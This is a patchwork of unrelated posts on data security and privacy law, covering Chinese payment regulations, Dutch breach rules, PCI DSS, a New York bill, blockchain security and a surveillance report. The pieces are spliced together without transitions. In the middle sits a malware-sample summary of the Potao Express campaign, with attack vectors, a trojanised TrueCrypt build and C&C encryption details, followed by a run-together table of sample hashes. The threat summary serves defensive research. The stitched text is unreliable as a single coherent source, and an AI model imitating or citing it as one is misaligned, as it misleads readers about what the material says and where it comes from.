On December 28, 2015, the People’s Bank of China published Administrative Measures for Online Payment Business of Non-bank Payment Institutions (the “Measures”). The Measures were enacted to provide further details on the regulation of online payment businesses, in supplement to the earlier Administrative Measures for the Payment Services of Non-financial Institutions (the “2010 Measures”), published by the People’s Bank of China on June 14, 2010. The 2010 Measures regulated the conduct of all payment services, including both online payment methods and three other types of payment methods, by all types of Non-bank Payment Institutions (“NBPIs”). The newer Measures are more focused and apply only to online payment methods, and only to NBPIs which have already obtained a Payment Business License and are engaged in an online payment business.

The impact of the Measures will reach beyond the payment market itself to promote the development of the e-commerce and Internet finance sectors in China. The Measures will come into effect on July 1, 2016. Consistent with the 2010 Measures, the new Measures require NBPIs to take effective protective measures for the security of their clients’ personal information, and to adopt risk control systems. The Measures further restrict the storage of clients’ sensitive information, such as track information or chip information of their clients’ bank cards, their verification codes or passwords. In principle, NBPIs are not allowed to store the effective term of the bank cards, unless they are stored for special business needs or pursuant to authorization by the clients and the banks opening the bank cards. Further, this information must be encrypted prior to storage.

Under the Measures, NBPIs are required to collect, use, store and transfer clients’ information only to the minimum extent necessary, and to notify clients of the purpose and scope of their use of the information. The Measures restrict NBPIs from providing clients’ information to other institutions or individuals, unless otherwise required by laws and regulations, or unless the provision of each item was confirmed and authorized by the clients.

The Measures also impose responsibilities on the NBPIs to bind the merchants which are counterparties to their online payment services. NBPIs are required to sign agreements with the merchants, prohibiting the merchants from storing sensitive information of their clients, and to adopt supervisory measures, such as periodic checks and technical monitoring, as may be necessary. If the merchants store sensitive information in violation of the agreement, the NBPIs are required to promptly suspend or terminate their provision of online payment services for these merchants, and adopt effective measures to delete the sensitive information and to prevent disclosure of it. The NBPIs also may be liable for losses and liabilities caused by the disclosure of relevant information.

The Measures further require NBPIs to maintain online payment business processing systems that are safe and comply with normative specifications, and related backup systems, within the territory of China. When providing services for domestic transactions, NBPIs are required to complete the transactions using their domestic business processing systems, and to complete the financial settlement within the territory of China.

Dutch Law Includes General Data Breach Notification Obligation and Larger Fines for Violations of the Data Protection Act

On January 1, 2016, a Dutch law became effective that (1) includes a general obligation for data controllers to notify the Data Protection Authority (“DPA”) of data security breaches, and (2) authorizes the DPA to impose direct fines for violations of the Data Protection Act.

Under the law, data controllers are required to immediately notify the DPA of any data security breaches that have, or are likely to have, serious adverse consequences to the protection of personal data. In addition, data controllers are required to notify affected individuals if there is reason to believe the breach could lead to adverse consequences to those individuals, unless the compromised data is encrypted or otherwise unintelligible to third parties. On December 9, 2015, the DPA published practical guidance to help organizations identify cases when data security breaches must be reported to the DPA and data subjects.

The new Dutch law also empowers the DPA to impose fines of up to €820,000 for violations of the Data Protection Act, including failure to report data security breaches. Last October, the DPA published draft guidance that defines the different violations, the categories of sanctions and the level of fines.

Read the Dutch DPA’s press release.

Blockchain, Cybersecurity and Global Finance

When novelist William Gibson said, “[t]he future is already here, it’s just not very evenly distributed,” he may have had innovation like blockchain technology in mind. In the near future, blockchain may become the new architecture of a reinvented global financial services infrastructure. The technology – a distributed, consensus-driven ledger that enables and records encrypted digital asset transfers without the need of a confirming third party – is revolutionary to global financial services, whose core functions include the trusted intermediary role (e.g., payment processor, broker, dealer, custodian).

Realizing this potential, global investment banks are beginning to develop public and private blockchain technology standards and protocols, with a goal of re-imagining their daily operations within the global financial system. While the possibilities for financial innovation – shared ledgers and smart contracts to name a few – are dizzying, it is important to remember one thing: the speed and extent of acceptance of blockchain technology within the global financial services community will ultimately depend on the security of the network. Earlier this year, Interpol reported that blockchain can be repurposed by hackers to export malware to all computers in the network. Interpol proved this by introducing a proof-of-concept malware that showed the viability of such a cyber-attack. In the event of an actual attack, blockchain’s virtues, such as decentralization and immutability, would instantly become vices, as the malware would spread far and wide and the pollution would not be easily erased.

The intermediary functions described above are currently critical actions within global financial services, particularly in relation to financial asset trading; however, these activities are increasingly expensive, inefficient and, most dangerous of all, risky. They are expensive because the information technology investment and maintenance costs are significant. They are inefficient because although trading is swift for many financial assets, settlement is not, with too much reliance on back office human agency and duplication of effort and systems. They are risky because settlement delay introduces counterparty risk, and data concentration on centralized servers introduces operational/systems risk. In short, they are increasingly capital-intensive activities in the post-Credit Crisis milieu, where despite muted trading revenue, the demands of regulators grow louder for more transparent reporting and real-time risk exposure recordkeeping.

What, then, is blockchain technology? It’s a decentralized ledger of digital asset ownership on which the asset owners, or users, can initiate transfer to other users whose interconnected computers run blockchain software (“nodes”). The transactions themselves are encrypted transfer data that, when confirmed (in batches, roughly every ten minutes), comprise the “blocks” and when linked sequentially to the referenced prior block, comprise the “chain.” Confirmation occurs when the first of these nodes, each of which maintains a current copy of the blockchain, verifies the transaction(s) by utilizing specialized computational software to solve a complicated encryption problem. Then, and only then, does this node add the new block sequentially into the chain, causing the other nodes to validate the solution and update their ledgers accordingly. This verification yields compensation (e.g., in bitcoins or other cryptocurrency) to the problem-solving node, a “miner”, for the processing power expended in first successfully confirming the transaction.

Blockchain is thus both a secure means of digitized asset transfer and a virtually incorruptible record of such transfer, confirmed by processing power consensus and protected by ledger distribution, from the original “genesis” block all the way through the current transaction. A technology that can automate trust in the transfer for value of digitized assets poses an existential threat to the financial institutions that choose to ignore it. However, blockchain offers an opportunity for collaboration and co-development – creative construction rather than destruction – for financial institutions and other market participants that choose to embrace it, for the technology is an elegant response to each of the challenges mentioned above. Distributed ledgers reduce cost and risk and, through secure consensus verification, increase data integrity. Third party disintermediation and the prospect for near real-time settlement increase efficiency.

Blockchain’s potential for disruptive innovation within the financial services industry and beyond is great. It will be greater still if network security remains foremost in mind.

Potao Express samples

http://www.welivesecurity.com/2015/07/30/operation-potao-express/

http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf


TL; DR


2011- July 2015
  • Aka  Sapotao and node69
  • Group - Sandworm / Quedagh APT
  • Vectors - USB, exe as doc, xls
  • Victims - RU, BY, AM, GE 
  • Victims - MMM group, UA gov
  • truecryptrussia.ru has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor to selected targets. 
  • Win32/FakeTC - data theft from encrypted drives
  • The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
  • 1st Full Plugin and its export function is called Plug. Full plugins run continuously until the infected system is restarted
  • 2nd Light Plugin with an export function Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
  • Some of the plugins were signed with a certificate issued to “Grandtorg”:
  • Traffic 
  • Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
  • MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
  • After receiving the request the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key .
  • In 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
  • The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key
  • The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32bits) and also the name of the current process.
  • Potao USB - uses social engineering, exe in the root disguised as drive icon
  • Potao Anti RE -  uses the MurmurHash2 algorithm for computing the hashes of the API function names.
  • Potao Anti RE - encryption of strings
  • Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
  • IOC https://github.com/eset/malware-ioc/tree/master/potao

TypeSHA256MD5
1stVersion1fe6af3d704d2fc0c7acd58b069a31eec866668ec6e25f52354e6e61266db8db85b0e3264820008a30f17ca19332fa19
1stVersion2ff0941fe3514abc12484ad2853d22fd7cb36469a313b5ecb6ef0c6391cf78abac854a3c91d52bfc09605506e76975ae
1stVersion54a76f5cd5a32ed7d5fa78e5d8311bafc0de57a475bc2fddc23ee4b3510b9d443b7d88a069631111d5585b1b10cccc86
1stVersion76c7c67274cf5384615a120e69be3af64cc31d9c4f05ff2031120612443c8360d1658b792dd1569abc27966083f59d44
1stVersion244c181eb442fefcf1e1daf900896bee6569481c0e885e3c63efeef86cd64c550c7183d761f15772b7e9c788be601d29
1stVersion887a721254486263f1f3f25f3c677da62ef5c062c3afa7ef70c895bc8b17b424a35e48909a49334a7ebb5448a78dcff9
1stVersion945c594aee1b5bd0f3a72abe8f5a3df74fc6ca686887db5e40fe859e3fc90bb1502f35002b1a95f1ae135baff6cff836
1stVersionab8d308fd59a8db8a130fcfdb6db56c4f7717877c465be98f71284bdfccdfa25a446ced5db1de877cf78f77741e2a804
1stVersionb22a614a291111398657cf8d1fa64fa50ed9c66c66a0b09d08c53972c6536766d939a05e1e3c9d7b6127d503c025dbc4
1stVersionfcfdcbdd60f105af1362cfeb3decbbbbe09d5fc82bde6ee8dfd846b2b844f97214634d446471b9e2f55158d9ac09d0b2
DebugVersion910f55e1c4e75696405e158e40b55238d767730c60119539b644ef3e6bc32a5d7263a328f0d47c76b4e103546b648484
DebugVersionc821cb34c86ec259af37c389a8f6cd635d98753576c675882c9896025a1abc53bdc9255df5385f534fea83b497c371c8
DebugVersionf845778c3f2e3272145621776a90f662ee9344e3ae550c76f65fd954e7277d195199fcd031987834ed3121fb316f4970
Droppersfrompostalsites4dcf14c41b31f8accf9683917bfc9159b9178d6fe36227195fabc232909452af65f494580c95e10541d1f377c0a7bd49
Droppersfrompostalsites8bc189dee0a71b3a8a1767e95cc726e13808ed7d2e9546a9d6b6843cea5eb3bda4b0615cb639607e6905437dd900c059
Droppersfrompostalsites048621ecf8f25133b2b09d512bb0fe15fc274ec7cb2ccc966aeb44d7a88beb5b07e99b2f572b84af5c4504c23f1653bb
Droppersfrompostalsitesaa23a93d2fed81daacb93ea7ad633426e04fcd063ff2ea6c0af5649c6cfa03851927a80cd45f0d27b1ae034c11ddedb0
Droppersfrompostalsitesc66955f667e9045ea5591ebf9b59246ad86227f174ea817d1398815a292b8c88579ad4a596602a10b7cf4659b6b6909d
Droppersfrompostalsitesd6f126ab387f1d856672c730991573385c5746c7c84738ab97b13c897063ff4ae64eb8b571f655b744c9154d8032caef
Dropperswdecoy61dd8b60ac35e91771d9ed4f337cd63e0aa6d0a0c5a17bb28cac59b3c21c24a9d755e52ba5658a639c778c22d1a906a3
Dropperswdecoy4328b06093a4ad01f828dc837053cb058fe00f3a7fd5cfb9d1ff7feb7ebb8e32b4d909077aa25f31386722e716a5305c
Dropperswdecoy15760f0979f2ba1b4d991f19e8b59fc1e61632fcc88755a4d147c0f5d47965c5fc4b285088413127b6d827656b9d0481
Dropperswdecoyb9c285f485421177e616a148410ddc5b02e43f0af375d3141b7e829f7d487bfd73e7ee83133a175b815059f1af79ab1b
Dropperswdecoycf3b0d8e9a7d0ad32351ade0c52de583b5ca2f72e5af4adbf638c81f4ad8fbcbeebbcb1ed5f5606aec296168dee39166
Dropperswdecoydbc1b98b1df1d9c2dc8a5635682ed44a91df6359264ed63370724afa9f19c7ee5a24a7370f35dbdbb81adf52e769a442
FakeTrueCryptextractedexe4c01ffcc90e6271374b34b252fefb5d6fffda29f6ad645a879a159f78e095979b64dbe5817b24d17a0404e9b2606ad96
FakeTrueCryptextractedexe5de8c04a77e37dc1860da490453085506f8aa378fbc7d811128694d8581b89ba7ca6101c2ae4838fbbd7ceb0b2354e43
FakeTrueCryptextractedexe73aae05fab96290cabbe4b0ec561d2f6d79da71834509c4b1f4b9ae714159b42f64704ed25f4c728af996eee3ee85411
FakeTrueCryptextractedexec7212d249b5eb7e2cea948a173ce96e1d2b8c44dcc2bb1d101dce64bb3f5beccc1f715ff0afc78af81d215d485cc235c
FakeTrueCryptSetup42028874fae37ad9dc89eb37149ecb1e6439869918309a07f056924c1b981deff34b77f7b2233ee6f727d59fb28f438a
FakeTrueCryptSetupa3a43bbc69e24c0bc3ab06fbf3ccc35cf8687e2862f86fb0d269258b68c710c9babd17701cbe876149dc07e68ec7ca4f
FakeTrueCryptSetupb8844e5b72971fe67d2905e77ddaa3366ae1c3bead92be6effd58691bc1ff8eccfc8901fe6a9a8299087bfc73ae8909e
FakeTrueCryptSetupfe3547f0e052c71f872bf09cdc1654137ee68f878fc6d5a78df16a13e6de176883f3ec97a95595ebe40a75e94c98a7bd
OtherDroppers2de76a3c07344ce322151dbb42febdff97ade8176466a3af07e5280bd859a18638e708fea8016520cb25d3cb933f2244
OtherDroppers4e88b8b121d768c611fe16ae1f008502b2191edc6f2ee84fef7b12b4d86fe000360df4c2f2b99052c07e08edbe15ab2c
OtherDroppers29dfc81b400a1400782623c618cb1d507f5d17bb13de44f123a333093648048f89a3ea3967745e04199ebf222494452e
OtherDroppers97afe4b12a9fed40ad20ab191ba0a577f5a46cbfb307e118a7ae69d04adc2e2d6ba88e8e74b12c914483c026ae92eb42
OtherDroppers793a8ce811f423dfde47a5f44ae50e19e7e41ad055e56c7345927eac951e966b043f99a875424ca0023a21739dba51ef
OtherDroppers904bb2efe661f654425e691b7748556e558a636d4f25c43af9d2d4dfbe83262e02d438df779affddaf02ca995c60cecb
OtherDroppersb62589ee5ba94d15edcf8613e3d57255dd7a12fce6d2dbd660fd7281ce6234f411b4e7ea6bae19a29343ae3ff3fb00ca
OtherDroppersd2c11706736fda2b178ac388206472fd8d050e0f13568c84b37683423acd155d27d74523b182ae630c4e5236897e11f3
OtherDroppersf1f61a0f9488be3925665f8063006f90fab1bf0bd0b6ff5f7799f8995ff8960e1ab8d45656e245aca4e59aa0519f6ba0
USBSpreaders1acae7c11fb559b81df5fc6d0df0fe502e87f674ca9f4aefc2d7d8f828ba7f5c76dda7ca15323fd658054e0550149b7b
USBSpreaders3d78f52fa0c08d8bf3d42074bf76ee56aa233fb9a6bc76119998d085d94368caca1a3618088f91b8fb2a30c9a9aa4aca
USBSpreaders7d15bd854c1dfef847cdd3caabdf4ab81f2410ee5c7f91d377cc72eb81135ff4a2bb01b764491dd61fa3a7ba5afc709c
USBSpreaders09c04206b57bb8582faffb37e4ebb6867a02492ffc08268bcbc717708d1a8919a59053cc3f66e72540634eb7895824ac
USBSpreaders12bb18fa9a12cb89dea3733b342940b80cd453886390079cb4c2ffcd664baeda2bd0d2b5ee4e93717ea71445b102e38e
USBSpreaders34e6fb074284e58ca80961feda4fe651d6d658077914a528a4a6efa91ecc749d057028e46ea797834da401e4db7c860a
USBSpreaders90b20b1687909c2f76f750ba3fd4b14731ce736c08c3a8608d28eae3f4cd68f3514423670de210f13092d6cb8916748e
USBSpreaders93accb71bf4e776955756c76990298decfebe4b1dd9fbf9d368e81dc1cb9532dabb9f4fab64dd7a03574abdd1076b5ea
USBSpreaders99a09ad92cc1a2564f3051057383cb6268893bc4a62903eabf3538c6bfb3aa9c542b00f903f945ad3a9291cb0af73446
USBSpreaders339a5199e6d0b5f781b08b2ca0ad0495e75e52b8e2fd69e1d970388fbca7a0d6a427ff7abb17af6cf5fb70c49e9bf4e1
USBSpreaders340b09d661a6ac45af53c348a5c1846ad6323d34311e66454e46c1d38d53af8b2646f7159e1723f089d63e08c8bfaffb
USBSpreaders461dd5a58ffcad9fffba9181e234f2e0149c8b8ba28c7ea53753c74fdfa0b0d5609abb2a86c324bbb9ba1e253595e573
USBSpreaders4688afcc161603bfa1c997b6d71b9618be96f9ff980e5486c451b1cc2c5076cbae552fc43f1ba8684655d8bf8c6af869
USBSpreaders7492e84a30e890ebe3ca5140ad547965cc8c43f0a02f66be153b038a73ee53141234bf4f0f5debc800d85c1bd2255671
USBSpreaders61862a55dcf8212ce9dd4a8f0c92447a6c7093681c592eb937a247e38c8109d4e685ea8b37f707f3706d7281b8f6816a
USBSpreaders95631685006ac92b7eb0755274e2a36a3c9058cf462dd46f9f4f66e8d67b9db29179f4683ece450c1ac7a819b32bdb6d
USBSpreadersb8b02cc57e45bcf500b433806e6a4f8af7f0ac0c5fc9adfd11820eebf4eb5d79cdc60eb93b594fb5e7e5895e2b441240
USBSpreaderse57eb9f7fdf3f0e90b1755d947f1fe7bb65e67308f1f4a8c25bc2946512934b739b67cc6dae5214328022c44f28ced8b
USBSpreaderse3892d2d9f87ea848477529458d025898b24a6802eb4df13e96b0314334635d03813b848162261cc5982dd64c741b450
USBSpreadersf1d7e36af4c30bf3d680c87bbc4430de282d00323bf8ae9e17b04862af28673635724e234f6258e601257fb219db9079


PCI Security Standards Council Releases Enhanced Validation Requirements for Designated Entities as PCI DSS Version 3.0 Set to Retire

Earlier this month, the Payment Card Industry Security Standards Council (“PCI SSC”) published a set of enhanced validation procedures designed to provide greater assurance that certain entities are maintaining compliance with the PCI Data Security Standard (“PCI DSS”) effectively and on a continuing basis. The payment card brands and acquirers will determine which organizations are required to undergo a compliance assessment with respect to these supplemental validation requirements, which are entitled the PCI DSS Designated Entities Supplemental Validation (“DESV”).

The DESV complements the PCI DSS and contains additional security control requirements that are organized into the following 5 control areas:

  1. Implement a PCI DSS compliance program;
  2. Document and validate PCI DSS scope;
  3. Validate that PCI DSS is incorporated into business-as-usual activities;
  4. Control and manage logical access to the cardholder data environment; and
  5. Identify and respond to suspicious events.

Those entities designated by the card brands for validation against the DESV must comply with the requirements set forth in the five control areas, which include, for example, increased administrative, validation and scoping controls. Entities that may be subject to the DESV include, for example, entities that (1) store, process or transmit large volumes of cardholder data; (2) provide aggregation points for cardholder data; or (3) have suffered significant or repeated breaches of cardholder data. According to the PCI SSC, the supplemental validation process typically will be performed in conjunction with the entity’s full PCI DSS assessment.

The release of the DESV coincides with the retirement of PCI DSS Version 3.0 on June 30, 2015. Although its replacement, Version 3.1, contains mostly minor updates and clarifications, the new version notably updates the standard’s encryption requirements to clarify that Secure Sockets Layer (“SSL”) and early Transport Layer Security (“TLS”) are not considered strong cryptography, and therefore will no longer be PCI DSS-compliant encryption protocols as of June 30, 2016. The migration from SSL to newer versions of TLS comes after several vulnerabilities were found to be associated with SSL, leading the National Institute of Standards and Technology to deem SSL as an unacceptable encryption protocol for the protection of data. In addition to the retirement of Version 3.0, the controls that Version 3.0 designated initially as best practices will now become PCI DSS requirements as of July 1, 2015.

Data Security Act Introduced in New York State Assembly

On April 8, 2015, a New York Assemblyman introduced the Data Security Act in the New York State Assembly that would require New York businesses to implement and maintain information security safeguards. The requirements would apply to “private information,” which is defined as either:

  • personal information consisting of any information in combination with one or more of the following data elements, when either the personal information or the data element is not encrypted: Social Security number; driver’s license number or non-driver identification card number; financial account or credit or debit card number in combination with any required security code or password; or biometric information;
  • a user name or email address in combination with a password or security question and answer that would permit access to an online account; or
  • unsecured protected health information (as that term is defined in the Health Insurance Portability and Accountability Act of 1996 (“HIPAA”) Privacy Rule).

The Data Security Act obligates entities to develop an information security program that includes:

  • administrative safeguards, such as conducting risk assessments, training employees and selecting service providers capable of maintaining appropriate safeguards;
  • technical safeguards, such as assessing risks in network and software design and regularly testing and monitoring the effectiveness of key controls; and
  • physical safeguards, such as disposing of electronic media so that the information cannot be read or reconstructed.

The Data Security Act deems certain specific entities in compliance with the law’s requirements, such as financial institutions that comply with the Gramm-Leach-Bliley Act, HIPAA-regulated entities, and entities that comply with NIST Standards. Entities that comply with the latest version of NIST Special Publication 800-53 are also immune from any civil liability under the Act.

The Data Security Act establishes a rebuttable presumption that an entity that obtains an independent third party certification complies with the requirements of the law. The New York Attorney General is empowered to enjoin any violations of the Data Security Act, and can obtain civil penalties of $250 for each person whose private information was compromised, up to a maximum of $10 million. For knowing and reckless violations, these amounts can increase to $1,000 for each affected person up to a total of the higher of $50 million or three times the aggregate amount of any actual costs and losses.

The Data Security Act also amends New York’s breach notification law by using the expanded definition of “private information” discussed above. Previously, New York’s law did not cover breaches involving biometric information, user names and passwords, or protected health information.

FTC Enters into Memorandum of Understanding with Dutch Data Protection Authority

On March 9, 2015, the Federal Trade Commission announced that it has entered into a Memorandum of Understanding (the “Memorandum”) with the Dutch Data Protection Authority (the “Dutch DPA”).

The Memorandum, which does not create legally binding obligations on the FTC or the Dutch DPA, focuses on the following five objectives:

  • cooperating when enforcing applicable privacy laws such as the FTC Act and the Dutch Data Protection Act, including sharing relevant information about complaints;
  • facilitating research and education about how to protect personal information;
  • aiding the mutual exchange of knowledge and expertise between the two entities via training programs and staff exchanges;
  • promoting the understanding of economic and legal conditions and theories that impact the enforcement of applicable privacy laws; and
  • informing each other of privacy-related developments in their respective countries.

The Memorandum describes specific procedures that the FTC and the Dutch DPA will take to achieve these objectives and notes that each country has the discretion to decide whether to provide assistance to the other on a given privacy-related matter. The Memorandum also discusses protective measures for transmitting information related to a request for assistance on a privacy-related matter, such as encryption or maintaining materials in secured, restricted locations.

In announcing the Memorandum, FTC Chairwoman Edith Ramirez emphasized the importance of cross-border cooperation and stated that “[t]his arrangement with our Dutch counterpart will strengthen FTC efforts to protect the privacy of consumers on both sides of the Atlantic.” Similarly, her counterpart, Chairman of the Dutch DPA Jacob Kohnstamm, noted that entering into the Memorandum marked a great step in efforts to increase cooperation among “data protection and privacy authorities across the globe” which is especially important “[i]n this day and age of increasing cross-border data flows.”

The Memorandum is similar to those previously entered into by the FTC with the UK Information Commissioner’s Office in March 2014 and the Office of the Data Protection Commissioner of Ireland in June 2013.

ENISA Issues Report on Implementation of Privacy and Data Protection by Design

On January 12, 2015, the European Union Agency for Network and Information Security (“ENISA”) published a report on Privacy and Data Protection by Design – from policy to engineering (the “Report”). The “privacy by design” principle emphasizes the development of privacy protections at the early stages of the product or service development process, rather than at later stages. Although the principle has found its way into some proposed legislation (e.g., the proposed EU General Data Protection Regulation), its concrete implementation remains presently unclear. Hence, the Report aims to promote a discussion on how the principle can be implemented concretely and effectively with the help of engineering methods.

The Report provides an overview of the ways in which businesses have implemented the “privacy by design” principle into their products and services. To this end, the Report reviews existing approaches and strategies to implement privacy by design, and gives a structured overview of twelve important privacy techniques (such as authentication, attribute based credentials, encryption communications, anonymity and pseudonymity, etc.). Further, the Report presents the challenges and limitations of “by-design” principles for privacy and data protection.

The Report concludes with a number of recommendations that address system developers, service providers, data protection authorities (“DPAs”) and policy makers on how to overcome and mitigate these limits. The main recommendations include:

  • Policymakers should support the development of new incentive mechanisms for privacy-friendly services and need to promote them (e.g., the establishment of audit schemes and seals to enable the customer to make informed choices and the establishment of penalties for those who do not care or obstruct privacy-friendly solutions);
  • The research community should further investigate privacy engineering, especially with a multidisciplinary approach;
  • Software developers and the research community should offer tools that enable the intuitive implementation of privacy properties. These tools should integrate freely available and maintained components with open interfaces and application programming interfaces;
  • DPAs should play an important role in providing independent guidance and assessing modules and tools for privacy engineering, such as in the promotion of privacy-enhancing technologies and the implementation of the transparency principle;
  • Legislators should promote privacy and data protection in their norms from the legal European data protection framework; and
  • Standardization bodies should include privacy considerations in the standardization process as part of international standards, and should develop standards for the interoperability of privacy features in order to help users compare the privacy guarantees of different products and services and make compliance checks easier for DPAs.

View the full report.

What’s with the TrueCrypt warning?

TrueCrypt, the free open source full disk encryption program favoured by many security-savvy people, including apparently Edward Snowden, is no more. Its website now redirects to its SourceForge page which starts with this message: WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data […]

White House Publishes Report on Government Surveillance Programs

On December 18, 2013, the White House published a report recommending reforms to the federal government’s wide-ranging surveillance programs. The voluminous report, entitled “Liberty and Security in a Changing World,” was authored by The Review Group on Intelligence and Communications Technologies, an advisory panel that includes experts in national security, intelligence gathering and civil liberties.

The report begins by describing the varying goals of U.S. surveillance efforts, which range from defending national security to protecting the right to privacy to strengthening strategic alliances with other countries. The report then details 46 recommendations designed to balance these goals. Some notable recommendations include:

  • Establishing a general rule that the federal government should not collect and store “mass, undigested, non-public personal information about individuals to enable future queries and data-mining for foreign intelligence purposes”;
  • Increasing the transparency of the Foreign Intelligence Surveillance Court;
  • Applying the Privacy Act of 1974, which regulates the use and disclosure of personally identifiable information by federal agencies to “both US persons and non-US persons”;
  • Increasing the use of encryption and urging U.S. companies to encrypt data in transit, at rest and in storage (including in the cloud); and
  • Creating a Civil Liberties and Privacy Protection Board to “oversee Intelligence Community activities for foreign intelligence purposes, rather than only for counterterrorism purposes.”

The report concludes by noting the rapid pace of technological development and emphasizing that the reforms advocated in the report are intended to “safeguard the privacy and dignity of American citizens, and to promote public trust, while also allowing the Intelligence Community to do what must be done to respond to genuine threats.”

Read the full report.